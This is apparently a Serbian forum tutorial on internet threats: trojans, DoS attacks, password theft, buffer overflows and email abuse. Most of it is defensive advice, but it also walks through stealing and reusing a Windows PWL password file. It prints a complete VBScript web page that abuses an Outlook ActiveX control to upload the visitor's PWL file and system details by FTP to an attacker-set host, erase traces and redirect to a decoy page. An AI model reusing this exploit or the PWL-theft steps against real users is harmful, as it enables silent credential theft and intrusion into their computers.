Sve u ovoj temi sam postovao iz razloga da korisnici shvate moguce opasnosti kojima se izlazu na internetu. Tema nema za cilj obuku i skolovanje mladog kadra za razne bahanalije na netu. Treba imati u vidu da svaki upad na tudj racunar i izazivanje bilo kakve stete drugim licima putem interneta, podleze krivicnom gonjenju.



Tema o kojoj se pisu knjige, o kojoj mozemo da lupetamo i raspravljamo do sutra. Otvaram ovu temu gde ce biti price o nacinima hakovanja i kako se od njih braniti najbolje sto moze.

Pocinjem od trojanaca.

Napad Trojanaca


   U slucaju da ste samo posumnjali da imate u sistemu trojanca, obratite na to veliku paznju!!! Ako ne uradite nista, tj. ako ga ne skinete sa racunara, postoji mogucnost  da “drugi” pristupe vasim podacima, password-ima i sto je najgore, “neko” moze izvrsiti razna krivicna dela preko vaseg racunara, kao sto je npr. napad nekog treceg racunara, banaka i slicno. Naravno vi o tim napadima necete nista znati ali cinjenica je da je “vas” racunar napao, tako da mozete imati velikih problema.



1. Sta su trojanci?

   Trojanci su, nesumnjivo, najveca pretnja sigurnosti na internetu. Ovo bi trebalo da bude na neki nacin, opsti tutorial o tome kako se zastititi od trojanaca, kako ih obrisati iz sistema, kako popraviti stetu ukoliko je ima. Da ne pricamo po ko zna koji put kako je nastao naziv i sta je Trojan horse u grckoj mitologiji, u kompjuterskom svetu trojanac je definisan kao "maliciozni, destruktivni program koji je najcesce prerusen u fajl koji je siguran, bar na oko". Na primer, download-ujete nesto sto je  muzicki ili video fajl. Prilikom pokretanja tog fajla, vi oslobadjate opasni program koji moze da ucini bukvalno sve, od brisanja vasih dragocenih podataka sa diskova, slanja brojeva vasih kreditnih kartica (kod nas jos te kartice nisu zazivele u vecoj meri), password-a, pa do totalnog preuzimanja vaseg racunara od strane “drugih” lica za izvrsenje krivicnih dela preko interneta i napadanje drugih sistema koji mogu trajati cak i mesecima pre nego sto primetite da se nesto “cudno” desava.



2. Kako se “dobijaju” sa neta?

   Trojanci su egzekutabilni programi, sto znaci kada ga otvorite (dupli klik) on se tada aktivira, i spreman je za “prljav posao”. U windows operativnim sistemima, egzekutabilni programi imaju ekstenzije kao "exe", "vbs", "com", "bat", itd. Primeri trojanaca su razliciti, neki trojanci izgledaju savrseno nevino : “dmsetup.exe”, “LOVE-LETTER- txt.vbs”, “FOR-YOU.txt.vbs" (kada postoji vise egzekutabilnih zavrsetaka, kao u prethodnim primerima, bitno je znati da se samo zadnji racuna, tj. zadnja ekstenzija je primarna ili osnovna, pokretacka).  Ima i za to resenja, svakako, nisu jedina, niti konacna.


Kako otkriti ekstenzije u windows-u?

Windows OS je namesten “fabricki” ili po “default-u” da sakriva (hidden files), kao i ekstenzije za poznate fajlove (known file types). Na primer. Imate neku sliku, recimo "Sex.jpg" , vi to vidite kao "Sex". Medjutim, postoji mogucnost da je ta “slika” ustvari nesto kao "Sex.jpg.exe ", sto znaci da je to neki egzekutabilni program, koji za masku koristi ono "Sex.jpg". Naravno, vecina ljudi se odmah isprima na naslov slike i odaradi ono “magicno” click-click. Na taj nacin se pokrece mali, ali jebitacan program koji se iz miloste zove trojanac.

Resenje bi bilo prosto :

Za Windows 95/97/98 :
- Otvorite Explorer
- U View meniju, izaberite Options
- Cekirajte - "show all files"
- Destiklirajte ili “un-check-irajte” - "hide MSDOS file extensions that are registered"
- Kliknite OK za kraj.

Za Windows 2000, XP :
- Idite na  Start | Settings | Control Panels | Folder Options
- Izaberite View tab
- Stiklirajte "show hidden files and folders"
- Destiklirajte ili “un-check-irajte” "hide file extensions for known file types"
- Kliknite OK za kraj.


Vazno:

Cak i kada “otkrijete” ekstenzije pomocu gore pomenutog postupka, i dalje necete biti u mogucnosti da vidite sve skrivene ekstenzije, npr. za fajlove koji se zavrsavaju sa :.shs, .pif, and .lnk (zaslugom nesretnog Microsoft-a). Nazalost i ovi fajlovi su egzekutabilni, i postali su  jedne od najpopularnijih ekstenzija za mnoge  trojance, npr.: "Movie.avi.pif" , sto vi vidite kao : "Movie.avi", ili "LIFE_STAGES.TXT.shs" sto izgleda kao "LIFE_STAGES.TXT".

Trojanci su svuda, bukvalno svuda prisutni na netu. Najvise ih ima na porno sajtovima (zasto je toliko zanimljivo skinuti porno clip od par megabajta, a na svakoj trecoj ulici cuci baja i prodaje vrhunsku pornjavu na divx-u i dvd-u)  i sajtovima sa crack-ovima raznoraznih programa. Kao sto sam rekao, trojanci koriste siroku lepezu maski kao sto su besplatne igre, filmici i muzika. Zrtve skidaju sadrzaj sa WWW ili FTP arhiva, a najlepsi i daleko najsladji nacin je razmena fajlova preko p2p - IRC/instant poruke/Kazaa itd.. Sta reci o onima koji su malo radoznaliji pa otvaraju atcmente nepoznatih poruka??? Trojanci obicno rade “tiho” i neprimetno i nanose stetu polako. Ne mora da znaci ali sto su vise na nekom sistemu, steta moze biti ogromna ukoliko se nista ne preduzima. 


3. Kako ih izbeci i ostati bezbedan?

Nikako !!!

Recimo neki x tip u ovom trenutku napravi nekog (extra dobrog) trojanca i pocne da ga siri nasumice…

Antivirusi -Najboljoj antivirusnoj kompaniji je potrebno najmanje 2 sata da provali uopste o cemu se radi (kod worm-ova jos toliko, ponekad i vise, zavisno od konstrukcije istog). Zatim im treba bar sat (cesce, mnogo vise) da spreme “vakcinu” za novonastalu vasku i tek tada vi dobijate onaj cuveni “update”, a do tada dosta kompova biva zavijeno u crno, nekad vise, nekad manje ali uvek. Naravno, treba li spominjati ljude koji imaju masu trojanaca napravljenih za licnu upotrebu, znaci trojanci totalno nepoznati raznim antivirusima i njihovim kompanijama?

Firewall-ovi -Vi imate neki firewall i bas vas je ortak nalozio da je “bas taj” najbolji, da mu nista ne prolazi….E to su, recimo, katastrofalne gluposti. Za prosecnog korisnika svaki firewall je dobar. Kao sto je vec bilo price na forumu, iole ozbiljniji “bad guy” nece napadati obicne korisnike-home user-e, vec ce se truditi da osteti neku firmu, podatke drzavnih/vladinih ustanova, itd. Ali, naravno, uvek ce biti onih koji ce eto, cisto iz zezanja da prave stetu, krasce vase uplaceno vreme, koristice vase sifre za logovanje na neke sajtove, a sto je najgore, moze sa vaseg racunara vrsiti sijaset krivicnih dela tako sto ce napadati druge korisnike. Najzahtevniji ali i najcesci napadi za zbunjivanje firewall-a su napadi sa vise od 2 racunara, a da pri napadima koriste sve veci broj portova koje firewall jedno vreme uspesno odbija. Broj portova koje jedan komp napada se povecava iz napada u napad. Firewall ce se u jednom trenutku tako zbuniti, da ce se ugasiti sam od sebe, restartovati ili cak otvoriti portove koji su mu po default-u blokirani?!?!?! Ma koliko cudno i nestvarno izgledalo, Zone Alarm je sampion u takvoj zbunjivosti, pogotovo novije verzije!!!

Zar nije i logicno? Svaki software koji radi po unapred zadatim komandama, sklon je pucanju ali je ipak bolje imati ga, nego nemati (Alan Ford ).
Iako se iz dana u dan hiljade novih trojanaca pravi, svi oni funkcionisu na slican nacin, pa ako imate firewall, a portovi koji su ovde na listi nisu blokirani, blokirajte ih:

-31337, 31338,31339 - standardni backdoor portovi (najcesci)
-1120, 1243, 18006, - Orifice 2000, n.bus, sub s., kao i njihove evoluirane verzije
-2140, 3150, 6711 ,6776, 7300, 7597 – Deep throat, net friend, girl spy…
-11000, 21554 Qaz, tdestroyer…

Naravno, postoji jos na hiljade portova ali ovi su nekako, najcesci.


Znaci:

1. Nikada ne download-ujte bilo sta preko messenger-a od ljudi koje ne poznajete. Izlazete se opasnosti i ako dosta  razmenjujete fajlove preko interneta, pogotovo ako dozvolite vasem p2p programu mogucnost da skida fajlove sa exe, cmd, bat i slicnim ekstenzijama.
2. Cak i ako fajl dolazi od druga, treba ga prethodno proveriti antivirusom, jer je moguce da je njegov racunar zarazen, a da to on i ne zna zato sto se trojanci (veci deo) trude da se automatski “salju” sa racunara na racunar.Uvek skenirajte bilo sta sto dobijete preko interneta sa sveze update-ovanim antivirusom.
3. Kao sto sam vec napisao, windows po default-u krije ekstenziju fajla, znaci : "pamela.jpg" moze da bude "pamela.jpg.exe" – ekzekutabilni trojanac! Da bi se smanjio rizik, unhide file extensions…
4. Batalite iskacuce poruke tipa “ click to scan your computer” i slicne navlakuse, jer ako kliknete, verovatno je trojanac vec tu…

Za dodatni pregled firewall-ova, mozete pogledati -> Burek test Firewall-ova ~ Mane ~ Vrline....


4. Kako ih se otarasiti?!?

Postoji vise resenja. U svakom slucaju, procitajte ih pre nego sto pozurite i u panici, obrisete sve sto treba i sto ne treba.

1.   Format C(cheney preporucuje!!!) : Ovo je jedini nacin, koji sigurno uklanja sve trojance i ostalu gamad! Znaci, formatirajte hard disc, instalirajte operativni sistem sa originalnog diska i to je to.

2.   Anti-Virus Software: Vecina antivirusa ce resiti problem , ali treba imati u vidu, da nijedan AV nije savrsen. Od izuzetne vaznosti je da uvek  download-ujete najnoviji update. Postoji dosta raznoraznih antivirusa i generalno gledano, svaki ce obaviti posao u vecini slucajeva :
-Kav;                                                                  -Nod32;
-Norton;                                                             -Avast;
-McAfee;                                                            -Pc-cillin;
-Panda;                                                              -Symantec;
-Bitdefender;                                                      -Zone Alarm Suite;
-Vexira;                                                              -F-proot.

Vecina gore navedenih antivirusa postoji u “trial” formi, sto znaci da mozete skinuti zeljeni AV i u roku od 30 dana mozete se uveriti u funkcionalnost istog. Za dodatni pregled antivirusa, mozete pogledati ovaj sajt, koji, izmedju ostalog, sadrzi  predloge o kofiguraciji svakog posebno, http://www.hackfix.org/software/antivirus-section.html, kao i kod nas, na forumu -> Burek test Anti-virusa ~ Mane ~ Vrline....

3.   Anti-Trojan Programi: Ovi programi su specijalizovani iskljucivo za pronalazanje trojanaca u sistemu. Jedna od boljih resenja su :
-a2;                                   -Tauscan;
-PCDoorGuard;                    -The Cleaner;
-Pestpatrol;                        -TrojanHunter.

4.   Registry: U registry-ju se mogu rucno ukloniti trojanci, mada ovo necu opisivati iz razloga sto je registry najosetljivija stvar u sistemu, tako da ukoliko neko zeli to da proba, neka bude maksimalno obazriv. Obavezno odradite backup!!! 


Primer rada trojanca

Osobi se posalje fino upakovani trojancic, pozeljno iz velike i jako mastovite porodice "backdoor", kao u ovom primeru.
Osoba (klijent) koja je poslala trojanca, startuje program koji omogucava konekciju servera(zrtve) i klijenta.

a. Na ovoj slici vidimo "komandnu tablu" trojanca iz domace radinosti:


Na mestu za IP adresu kuca se zrtvina IP koja se moze pronaci skeniranjem odredjenog porta (to je onaj port preko koga komuniciraju klijent i server trojanca).

b. Konektovanje uspesno...


c. Posto je konekcija omogucena, lamer krece u pretragu C diska...


d. I tako...


e. U My Documents nalazi zanimljiv sadrzaj...


f. Interesantnih stvari ima....


g. Mmmmmm...


h. Ima 2 lepa izbora...


i. Download complete...


j. I jos malo download-a


k. Kada odaradi sve sto pozeli, napadac ostavi ponekad i poruku, a sve u dobrom duhu prijateljstva...

Denial of Service napadi (da ne prevodim, zvuci smesno)



   Kao sto naslov kaze, ovde ce biti reci o tzv. “DoS” - (Denial of Service) napadima, koji se koriste iskljucivo da bi diskonektovali odredjeni racunar sa neta, pa i crash-a istog. Da su DoS napadi ozbiljna stvar, dokazao je jedan klinac kada je 2000. god. koristeci par najprostijih DoS alata uspeo da napravi totalni kolaps kompanijama Yahoo i Amazon! Ovakvi napadi se jos zovu i “nukovanje”, “hakovanje”, “cyber-napad” ali u principu, sve su to druge reci za istu stvar…

DoS napadi su dosta cesti i uopste, nisu za salu. U dosta zemalja postoje rigorozni zakoni  koji se ticu samo DoS napada. Npr. Jeffrey Parson, dvadesetogodisnjak (koji je izmedju ostalog i tvorac crva Blaster), je pomocu DoS napada  uspeo da razvali “samo” 48 000 kompova, osudjen je na 18 meseci zatvora na njegovu ogromnu srecu.

Cesto su zrtve napada ljudi na IRC-u (Internet Relay Chat), mada DoS napad ne ukljucuje IRC servere ni na koji nacin, tako da IRC operateri nisu u mogucnosti da zaustave ili kazne napadace. Ako ste napadnuti, ne uzimajte to licno i ne pokusavajte odgovarati drugim, nelegalnim metodama, jer u tom slucaju i vi krsite zakon, a moze doci i do napada veceg intenziteta (na netu nikada ne znate sa kim imate posla). Umesto toga, pobrinite se da vas racunar “dobije” sve patch-eve koji se ticu ranjivosti sistema, kao i neki dobar firewall. Denial of service napade ne treba svrstavati sa virusima, trojancima, crack-ovanjem, kao sto se to u praksi radi.

Postoje dva tipa DoS napada:


1. Operating System napadi, koji za cilj imaju urusavanje OS-a; (potrebno je sistem redovno update-ovati   patch-evima za novootkrivene bezbednosne propuste)

2. Networking napadi, koji za cilj imaju “pucanje” internet konekcije, onemugucavanja izlaska na internet,…itd. (obezbediti neki firewall)


Operating System napadi

Ova vrsta napada, kao sto je receno ima za cilj crash OS-a (rusenje, urusavanje, pad,…itd), koji je u upotrebi na vasem racunaru, recimo Windows XP. U principu, cim se pojave u vecem mahu ovakvi napadi, hitno se popravljaju propusti u sistemu,(Tako bar tvrdi kompanija Microsoft) tako da, ukoliko redovno update-ujete vas OS, znacajno smanjujete mogucnost pomenutih napada. Kako apeluje kompanija Microsoft, svi korisnici Windows OS-a, trebalo bi da redovno posecuju http://windowsupdate.microsoft.com radi download-a najnovijih patch-eva. 


Networking napadi

Ova vrsta napada, laicki receno ima za cilj da ogranici ili da ugusi internet konekciju izmedju korisnickog racunara i IRC servera ili vaseg ISP-a (Internet Service Provider). Rezultat ovog napada nije crash-ovanje OS-a. Za ovu vrstu napada uopste nije bitno koji OS koristite i prakticno, ne postoji nacin da se odbranite od njega. Cak su nemocne velike kompanije poput Yahoo-a i Microsoft-a Koje imaju i po vise ovakvih napada dnevno. Znaci Network (mrezni) napad ukljucuje tzv. flood-ovanje (primanja velike kolicine odredjenih podataka koji imaju za cilj da prevazidju “normalan kapacitet” vase konekcije, te da je tako uguse ili prekinu u potpunosti. Na ovaj nacin racunar se “obmanjuje” i najcesce sam prekida konekciju jer “misli” da je mreza (network) iz nepoznatog razloga dozivela krah.

Ne mora da znaci ako vam konekcija pukne da je to bas Network napad. Situacija treba da postane sumnjiva ukoliko veza cesto puca, pogotovo ako ste na odredjenom IRC kanalu, kao i ako vam konstantno izlaze poruke, usled pucanja veze "Connection reset by peer".

Vas ISP moze podesiti firewall koji zaustavlja flood-ovanje pre nego sto dopre do vas. Ukoliko su napadi cesti, sa sve jacim intenzitetom, ISP moze zatraziti pomoc ministarstva unutrasnjih poslova, radi pronalazenja i kaznjavanja napadaca. Nazalost, vecina nasih ISP-a je prilicno neiskusna oko iznalazenja resenja za odbranu od velikog broja flood napada, tako da je korisnik ostavljen sam sebi. Ako se ovo desi vama, najbolja odbrana je, nesumnivo, strpljenje dok napadacu ne postane dosadno (glupo ali u vecini slucajeva, delotvorno resenje) ili promena provajdera.

Primeri u slici:

1. DoS attack



2. IP scanning:



3. IP scanning:



4. IP scanning:



5. Pocket Sniffing:

Network, war zone!?!

Pokusacu da objasnim par tehnika koje lameri koriste pomocu kojih mogu da dobiju kontrolu nad tudjim racunarom.
Generalno, postoje 3 kategorije (sa dosta podgrupa) napadaca preko interneta :

•Adolescentni amateri— Preko 80% napada sa neta dolazi od ove kategorije. Poznaju samo povrsno tehnike upada na tudje sisteme. Vecinu alata skidaju preko interneta, ne znaju koliku stetu mogu da naprave, zato su, na neki nacin, veoma neugodni.
•Hobi crackeri— U ovu kategoriju spada i starija ekipa ljudi koji dobro poznaju tehniku upada i vise vrsta napada preko interneta. Vecini su specijalnost: DoS napadi, crackovanje programa kao i druge nelegalne radnje koje se mogu raditi na internetu.
•Profesionalni hakeri— Ovo je relativno mala ali najopasnija grupa koja se sastoji od vrhunskih eksperata za kompjuterske sisteme. Jako ih je tesko uhvatiti zato sto poznaju veliki broj trikova za anonimni napad. Medjutim, nikada nece napasti nekog obicnog “home” usera. To je njima “ispod nivoa”. Poseduju zavidan koeficijent inteligencije, izuzetno dobro se sluze tehnikom obmane. Rade iskljucivo zbog svog entuzijazma, mada i nemali broj njih radi za velike honorare. Napadaju iskljucivo dzinovske korporacije koje hoce da uspostave monopol na trzistu, kao i vladine organizacije, NATO, Pentagon,….itd. Najveci eksperti su iz sledecih zemalja: Indija, Pakistan, Rusija, Izrael, Egipat, zemlje jugositocne Azije, Nemacka, Spanija, Srbija, Grcka, Bugarska,…itd. Verovali ili ne, malo ih ima u SAD, pa su se zato potrudili da naprave cak 3 dela filma o hakerima (cujem da se i cetvrti priprema).

Nemoguce je opisati u par recenica raznorazne nacine koje napadaci koriste da bi preuzeli kontrolu nekog sistema. Nikada mi nece biti jasni ljudi koji tvrde da nikada nisu “popili” trojanca, neki virus sa neta ili kada izjave da su njihovi kompjuteri extra sigurni samo zato sto koriste, kav, pc-cillin, vexiru,..itd. Ako mislite ovako, razmislite ponovo, jer neko provodi dosta vremena sedeci za svojim kompom pokusavajuci da nadje nacin za upadanje…

Sta napadac hoce?

Kompjuterski napad kao i infiltracije u sistem  su organizovani u sledecim postupcima :

Osnovno : Obezbediti “ulazak” u sistem;
-Dobiti privilegije;
-Napraviti stetu;
-Pripremiti teren za sledeci napad (opciono).


1. Obezbediti “ulazak” u sistem

Kradja password-a

Kao sto svi znaju, klasicni nacin da se nekom “udje” u kompjuter, je da se password (lozinka) provali. Napadac koji obezbedi ulaz u sistem, dalje koristi tehnike da dobije sve neophodne privilegije. U sustini, “nalazenje” lozinke je obicno prvi korak u crackovanju. Metode nalazenja password-a variraju od high-tech programa ( password-cracking dictionary scripte i raznorazni de-encryption programi), pa sve do low-tech tehnike (preturati po kantama ili po fijokama osobe koju zelite da unistite). Metode provaljivanja password-a mogu biti:

•Obmana;
•Trojanci;
•Guessing (nagadjanje);
•Presretanje.

Obmana

Bez obzira koliko je mreza bezbedna, ljudski faktor je uvek tu. Cesto napadac vidi lozinku zalepljenu na monitoru neke budale iz firme ili jednostavno, ukoliko je nekome password mali, tj. par slova, moze se lako “provaliti” ukoliko se gleda u osobu koja ga kuca. Recimo, kada neki radnik dobije otkaz, njegov account se deaktivira ali sta se desava ako su ostali zaposleni delili svoje password-e medjusobno sa njim (cesta praksa u svim firmama)? Moze doci do kurslusa….
 Cesto se desava da napadac da link ka "fake-laznoj" stranici (lazni link u kome se trazi zrtvin login i password i na taj nacin najlakse dodje do lozinke). Ovo je obmana (kao i svaka druga) koja se koristi za zrtve koje imaju oskudnije znanje o zastiti na internetu.
 Malo iskusniji napadac ce pokusati da zatrazi pass direktno od admina. Prosto, nazove sys admina i obmana pocinje : "E, Zika ovde iz racunovodstva, daj leba ti, resetuj mi ili mi kazi password. Zaboravio sam ga….itd" Zvuci debilozno ali to je prvo sto ce svaki iole pametniji napadac da uradi, da bi sebi ustedeo trud i podosta vremena.
U danasnje vreme, vecina kompjuterskih sistema dolazi sa nekim uobicajenim “default” password-ima, a vecina korisnika to nikada ne menja. Desavalo mi se milion puta da upadnem na tudj access point, kucanjem nekih default IP adresa za podesavanje istog. Dovoljno je da je neko malo vise neizivljen, pa da samo promeni IP za setovanje AP-a. Nebitno sto se AP moze vratiti onim ili ovim putem, cinjenica je da vam je neko zadao dodatni, nepotrebni posao. Zato, obavezno menjajte sve sa default vrednosti. Da li treba trositi vreme i pricati o password-u ***** tj. ADMIN…

Evo jednog primera dobre obmane :

Nije losa fora, a? Na ovaj nacin saljete vas password nekome ciji je e-mail: BIN_RECOVER_PASSw@yahoo.com

Trojanci kliknuti...


Guessing (nagadjanje)

Neke lozinke su tako jednostavne, tako jadno osmisljene, da ih moze provaliti i blago retardirana osoba. Necete verovati koliko ljudi ima istu lozinku kao i username (kod mene je bio slucaj da sam imao lozinku “zworc”, sto je “crowz” kada se cita otpozadi), sto je, takodje idiotsko resenje. Dosta korisnika koristi imena dece, kucnih ljubimaca, zatim jako proste kombinacije kao npr.: 123456, abcde, ili zzzzzz.
Postoji sijaset programa za guessing, tako da to olaksava prljavi posao napadacu. Jednostavno, u programu postoje razne opcije u kojima moze da se definise kako da se otpocne nagadjanje. “Taj” program trazi ocigledne kombinacije, ima sopstvenu bazu “losih” password-a. Naravno, vecina ovakvih alata ima mogucnost da “nagadja” sve moguce reci koje postoje u nekom jeziku (dictionary attack). Ovo moze trajati jako dugo, u zavisnosti od tezine same lozinke ali treba imati u vidu da kompjuteri “nagadjaju” veoma brzo.
Najbolja zastita od ovakvih napada je dobro osmisljen password. Naravno, nije lose ako se povremeno i menja.


Presretanje

Packet sniffers i slicni alati koji nadgledaju saobracaj u mrezi, mogu lako da “uhvate” password koji se transmituje preko mreze i to u cistoj, neenkrimptovanoj, tekstualnoj formi. Mnogo TCP/IP fora i fazona kao sto su : Telnet i Remote Access ili NMP (Network Management Protocols)su dizajnirani da transmituju lozinke u tekstualnoj formi. Neke verzije su nudile enkriptovanje lozinki, mada se konstantno lozinke provaljuju upravo preko Telnet-a.
Postoje vise metoda enkripcije lozinki. Sve je bolje od golog, tekstualnog oblika lozinke. Mana je u tome sto ako neko poseduje alat kao sto je recimo L0phtcrack, moze dekodirati enkriptovane lozinke upotrebom brute force tehnike.Enkriptovanje pomocu SSL and Ipsec tehnologije, znacajno je podiglo sigurnost lozinki na internetu.



Sta uciniti po pitanju zastite licne lozinke?

Nekoliko obicnih, logicnih zakljucaka i saveta :

1.Nikada, nikada ne govorite vas password (lozinku) bilo kome, ne pisite je na monitoru, ne cuvajte u racunaru u nekom txt. Dokumentu;
2.Menjajte lozinku u nekom razumnom vremenskom intervalu, formirajte je od barem 6 karaktera, kombinacija slova i brojeva, npr. P1e2r3a4, Zi~Ka~6, a*a+b*b=c*c, itd.
3.U grupu lozinki koje se lako provaljuju su imena dece, kucnih ljubimaca, omiljenih kola,…itd.(nikada se ne zna ko zeli da vam hakne password)

Najgluplje su lozinke koje su identicne username-u, to je prva stvar koju ce napadac pokusati ako pocne da hakuje lozinku. (Vecina ljudi na netu upravo username stavi kao lozinku!!!).

Alternativne metode napada


Hakovanje lozinke nije jedini nacin “upada”. U alternativne metode napada mogu se svrstati :   

•Buffer overflow;
•Trikovi sa skriptama;
•Email worms (crvi u e-posti).



Buffer Overflow

Kada neka aplikacija prima podatke preko interneta (cak i kada ih prima sa tastature), mora da ima dovoljno prostora (memorije) da bi mogla da primi odredjeni set podataka. Prostor koji prikuplja te podatke se naziva buffer. Aplikacije na netu “pokazuju” svoj buffer da bi bilo sta mogli da prime od odredjenih aplikacija. Ako primi vise podataka i tako preplavi buffer (buffer overflow), cudne se stvari mogu desiti. Ako se “ne kontrolise” priliv, podaci koji preplave buffer, mogu postati prisutni u samom izvrsnom delu procesora (CPU's execution area), sto znaci da komande koje se salju preko tog owerflow-a mogu postati izvrsne komande (exe).
Neke veoma popularne aplikacije na internetu sadrze u sebi dosta ranjivosti na buffer overflow napade.Unix-bazirani e-mail server Sendmail je bio vrlo cesto meta napada buffer overflow-a. Internet Information Server (IIS) kao i vecina Microsoft proizvoda su takodje zrtve velike kolicine buffer overflow napada.


Trikovi sa skriptama (Script Tricks)

Kao sto znate, HTTP, HTML, i World Wide Web (www), common gateway interface (CGI) je jedan aplikacioni interfejs koji se koristi za integraciju skripti sa web sajtovima. CGI skripte se koriste u velikoj meri  na internetu. Iz dana u dan, sve vise se otkrivaju CGI ranjivosti (narocito skripte koje su jadno napisane).
U nekim slucajevima, skripte koje primaju podatke od odredjene osobe, mogu biti “obradjene” da postanu egzekutabilne komande.


Email Worms (crvi u e-posti)

E-mail klijenti (narocito nesretni Microsoft's Outlook klijent) tretiraju atacmente u e-mail-u kao objekte i ako kliknete da biste otvorili sadrzaj atacmenta, moze se desiti da aktivirate nekog worm-a, koji se ugnezdi u registry racunara i koji je u stanju da promeni odredjena registry podesavanja i tako obezbedi nesmetan ulazak napadaca i njegovo sirenje po sistemu.
Zato nikada nemojte otvarati atacmente mail-ova koji stizu od nepoznatih ljudi. Cak i kada vam stigne mail od druga, drugarice, obavezno ga proverite sveze update-ovanim antivirusom!!!

Sta je to?


PWL fajl je datoteka u kojoj se nalaze user name i password-I (sifre za konekciju, ftp, za pristup, recimo burek forumu, itd.) . On se nalazi na odredjenom mestu i ima ekstenziju PWL. Ukoliko pokusate da otvorite datoteku koju ste nasli nekim TXT editorom, dobili biste nekakve hijeroglife, tj. nista sto bi bilo od “koristi”, radi se o  enkriptovanom fajlu. Za ovu operaciju je potreban PWL citac.




I sta dalje s’tim?


Zaboli smo nekome PWL fajl, sad jos samo treba da se provali kako ga “procitati”. Ima par zanimljivih resenja : kriscenje alata za nagadjanje (ovakva operacija moze trajati x dana, vidi sliku)

 ili zanimljivija metoda. Pozeljno je imati jos jedan fajl iz Windows direktorijuma, svi znamo to, jel tako? Sad ace se neko napraviti pametan pa ce pitati zasto treba jos nesto sem PWL fajla…Pa naravno, u “tom” direktorijumu se nalazi username od osobe kojoj je PWL fajl ukraden. Sada, taj ukradeni PWL fajl treba kopirati u Windows direktorijum, pa otvoriti u nekom text editoru onaj (necu reci koji) fajl I pod stavkom password list se dopise (copy-paste) red koji ste pronasli u onom “dodatnom” fajlu koji je ukraden zajedno sa PWL fajlom. Znaci, ako ste u “vasem” fajlu nasli recimo ovo:

Password lists
Mitar Miric=L:\Winamp\Mitar Miric.PWL

a u onom drugom “pozajmljenom” fajlu ovo:

Password lists
Marsicanin=H:\Adobe\Marsicanin.PWL gde je Marsicanin user name

potrebno je kopirati ispod “Mitar Miric=L:\Winamp\Mitar Miric.PWL” ovo : “Marsicanin=H:\Adobe\Marsicanin.PWL gde je Marsicanin user name”

Sada smo dobili mogucnost da se ulogujemo na komp sa korisnickim imenom “Marsicanin”.



Sta dalje?


Postoji mnogo PWL citaca (vidi sliku dole), sve je sa njim prakticno zavrseno. U slucaju da ne postoji mogucnost da se taj “drugi” fajl nabavi, postoji alternativna metoda : samo ime PWL fajla… ako ovo ne podje za rukom, napadac obicno “pogadja” korisnicko ime, pa ga sam kuca ispod onog prvog reda.


Sledi logoff, pa ponovni login sa korisnickim imenom koji ste dobili (u gore navedenom primeru, to je Marsicanin), zatim se pokrene PWL citac I to bi ukratko, bilo to.

Sva sreca pa je davnih dana ispravljena greska.


O cemu se radi?


Prvo je potrebno biti malko glup pa koristiti za surfovanje Internet Explorer. Recimo, citate postu sa vasim “omiljenim” mail client-om (outlook). U medjuvremenu, browser vas “odvede” na neku sumnjivu stranicu prepunu klinki koje orgijaju sa crncima, moze se desiti da neke proizvoljne komande budu izvrsene na kompu koji se koristi. Koristeci ovaj bug, napadac moze da cita, menja I brise poruke iz outlook-a. E sad, for a je sto se ovo moze odraditi na svim sigurnosnim nivoima Internet Explorera, a da naivni korisnik uopste nema pojma da se bilo sta desava, jer ne dobija ama bas nikakva upozorenja!



U cemu je problem?


ActiveX. ActiveX, prilikom instalacije XP-a ubacuje maliciozni program "Microsoft Outlook View Control". Sta reci sem da u kombinaciji sa Windows Scripting Hostom, moguce su bahanalije neslucenih razmera!

Propust (primer koriscenja ovog propusta):

<html>
<head>
<title>otvaranje fajla</title>
</head>
<body text="#00FF00" bgcolor="#000000">

<p align="center"><blink><font size="6">Sacekajte par sekundi, i
bicete redirektovani...</font></blink></p>
<p align="center">stranicu napravio: <a href="mailto:Trinity@verat.net">dql</a></p>

<p align="center">
<SCRIPT LANGUAGE=vbscript>
<!--
Sub f
    On Error Resume Next
    set sel=o1.object.selection
    set obj1=sel.item(1)
    set wshn = obj1.Session.Application.createobject("wscript.network")
    set wshs = obj1.Session.Application.createobject("wscript.shell")
    Set fso = obj1.Session.Application.CreateObject("Scripting.FileSystemObject")

    sIme=wshn.username          'uzimanje imena logovanog korisnika
    'ciscenje imena od razmaka
    for i=1 to len(sIme)
        if mid(sIme,i,1)=" " then
            tmp=""
        else
            tmp=mid(sIme,i,1)
        end if
        sTempIme = sTempIme + tmp
    next
    'skracenje na duzinu od 8 znakova
    if len(sTempIme)>8 then sTempIme=left(sTempIme,8)
    sIme=sTempIme

    Set file = fso.CreateTextFile ("c:\windows\temp\komande.txt", TRUE)
    file.write "user"+vbcrlf    'ime korisnickog imena za logovanje na ftp sajt
    file.write "pass"+vbcrlf    'sifra za logovanje na ftp sajt
    file.write "put c:\windows\"+cstr(sIme)+".pwl"+vbcrlf
    file.write "put c:\windows\temp\"+cstr(sIme)+".txt"+vbcrlf
    file.write "quit"+vbcrlf
    file.Close
    Set file = fso.CreateTextFile ("c:\windows\temp\"+cstr(sIme)+".txt", TRUE)
    file.write "ime kompa: "+cstr(wshn.computername)+vbcrlf
    file.write "ime usera: "+cstr(wshn.username)+vbcrlf
    file.write "domen: "+cstr(wshn.userdomain)+vbcrlf
    file.close
    Set file = fso.CreateTextFile ("c:\windows\temp\fajl.bat", TRUE)
    file.write "ftp -s:c:\windows\temp\komande.txt 127.0.0.1"+vbcrlf    'umesto 127.0.0.1 unesite IP hosta na koji treba da se uploaduje PWL
    file.write "del c:\windows\temp\komande.txt"+vbcrlf
    file.write "del c:\windows\temp\"+cstr(sIme)+".txt"+vbcrlf
    file.write "del c:\windows\temp\fajl.bat"+vbcrlf
    file.close
    wshs.run "c:\windows\temp\fajl.bat",vbhide
   
    location = "pocetna.htm"    'preusmeravanje na laznu stranicu
End Sub

settimeout "f",2000

-->
</SCRIPT>

<OBJECT classid=clsid:0006F063-0000-0000-C000-000000000046 id=o1
style="HEIGHT: 1; WIDTH: 1"><PARAM NAME="Folder" VALUE="Inbox">
</OBJECT>

</body>
</html>



Kako resiti ovo?


Reinstall everything may fix the problem…. 

Zloupotrebe elektronske pošte


Pod zloupotrebom elektronske pošte tokom godina su se izdvojili različiti pravci posmatranja.

•        Sakupljanje ličnih informacija;
•        Zloupotreba podataka u komercijalne svrhe putem e-mail-a;
•        Lažno predstavljanje pute elektronske pošte (e-mail);
•        Korišćenje e-maila kao načina distribucije virusa.
 
Sakupljanje ličnih informacija (Personal data abuse) Kršenje privatnosti korisnika je kada se podaci o njima daju trećim licima bez njihovog odobrenja.

